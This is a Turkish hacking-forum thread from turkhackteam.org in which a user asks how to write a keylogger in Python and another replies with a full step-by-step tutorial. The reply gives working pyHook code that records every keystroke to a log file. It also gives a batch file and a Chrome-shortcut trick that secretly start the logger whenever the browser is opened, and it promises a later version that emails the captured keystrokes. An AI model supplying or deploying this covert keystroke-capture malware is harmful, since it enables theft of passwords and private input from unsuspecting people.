Pyhton İle Keylogger

LsbaRRo

Üye
13 Mar 2013
82
0
Esenlikler Dostlar
Başlıkta da belirttiğim gibi Python ile keylogger yazmak mümkünmüdür? Yazmak için nasıl başlamak gerek?
Python'u kullanalı daha 3 gün olmadı bir çok şey öğrendim ezberimde daha da kendimi geliştirmek istiyorum.Forumda aradım fakat bulamadım varsa yazarsanız çok güzel olur.
Teşekkürler şimdiden

kondanta

Katılımcı Üye
29 Tem 2017
910
0
CNCF
Ilk olarak, programlamayi ezberleyerek ogrenemezsin. Olayin mantigini kavramaya calismani tavsiye ederim. Kendini o dilde yeteri kadar elverisli hissediyorsan, veri yapilarina ve algoritmalarina bak. Onlari yazmayi dene. Onun disinda soruna donecek olursam, tabiki de mumkundur. Oturur assemblyle de keylogger yazarsin, dile yeteri kadar hakim oldugun surece bir engelle karsilasacagini dusunmuyorum.

ipsala

Üye
29 Tem 2017
103
0
Merhaba dostlar;
Bugün size python dilini kullanarak basit keylogger yapmayı anlatacağım.
Öncelikle ;
Python pyhook modulu indir //Python 2.7 öneriyorum
Python pywin32 indir //2.7 indirin
C Diskimize geliyoruz.
important adında dosya açıyoruz.
C>important
Ardından Python'u açıyoruz.
C+N veya File > New File Seçeneğini kullanarak.. Yeni ekranımızı açıyoruz.
Aşağıdaki Kodları aynen yapıştırıyoruz.
Kod:
import pyHook, pythoncom, sys, logging
file_log = 'C:\\important\\log.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(1,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Ardından F5 veya RUN MODULE seçeneğini kullanarak dosyamızı. açtığımız important dosyasına .pyw uzantılı olarak kaydediyoruz. Python scriptimiz hazırdır. (Y)
Şimdi not defteri ile bağdaştıracağız. important adlı dosyamızda yeni not defteri açıyoruz..
Kod:
@echo off
start "" "c:\important\secret_file.pyw"
start "" "c:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
Bu kodları yapıştırıyoruz.. Ve .bat uzantılı olarak kayıt ediyoruz.
Ardından Google Chrome kısa yolunu alın. Sağ tıklayıp özellikler yapınız. Hede yerini şu şekilde değiştirin >> C:\important\dosyaisminiz.bat --->> bu dosyaisminiz.bat kısmına important klasörüne kaydettiğimizi yazıyoruz. Örneğin; ben launch.bat olarak kaydettım.
C:\important\launch.bat şeklinde yazıyorum.
Bu Basit Keylogger İlerde anlatacağım e-mail gönderen resimli keylogger gönderen kodun başlangıcıdır (Y)
YORUMLARINIZA VE SORUNLARINIZA AÇIĞIM. YORUMA YAŞADIĞINIZ SORUNLARI YAZMAYI UNUTMAYIN!!

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.